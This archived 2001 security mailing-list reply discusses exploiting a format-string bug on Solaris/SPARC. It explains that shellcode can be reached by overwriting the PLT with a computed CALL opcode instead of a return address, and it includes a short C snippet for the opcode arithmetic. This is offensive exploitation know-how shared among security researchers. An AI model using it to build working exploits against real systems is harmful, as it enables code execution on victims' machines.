> I've never tried what you're attempting to do but if you can
> exploit the format string multiple times you could overwrite
> a couple of instructions in the PLT and create a JMPL
> instruction.
It's possible to overwrite the PLT with a CALL instruction,
writing only once. I did it on Solaris 2.7/sparc
The easiest way to exploit a format string is to overwrite any return
address
(paddress) to point to your shellcode , but you can add few lines of
code to
your exploit and translate the address of your shellcode (value) to a
sparc call opcode.
In this way you are able to overwrite the PLT.
if (p_plt)
{
value = ((value - paddress)/4) +0x40000000;
printf ("Sparc Opcode:%x\n",value);
}
--
==============[ CORE Security Technologies ]===============
Juliano Rizzo
Security Consultant
juliano.rizzoat_private
Florida 141 | 2º cuerpo | 7º piso
(C1005AAC) Buenos Aires | Argentina
Tel/Fax : (54 11) 4878-CORE (2673)
info.argentinaat_private | www.corest.com
=====================================================
This eMail and any files attached to it are confidential and intended
solely
for the use of the individual or entity to whom they are addressed. If
you
are not the intended recipient or the person responsible for delivering
to
the intended recipient, be advised that you have received this email in
error and that any use is strictly prohibited. If you have received this
email in error, please notify Core Security Technologies by reply email
or
dial (54 11) 4878-CORE (2673), and delete the material from any
computer.
Thank you.
--- for a personal reply use: Juliano Rizzo <juliano.rizzoat_private>
This archive was generated by hypermail 2b30 : Fri Dec 28 2001 - 08:56:33 PST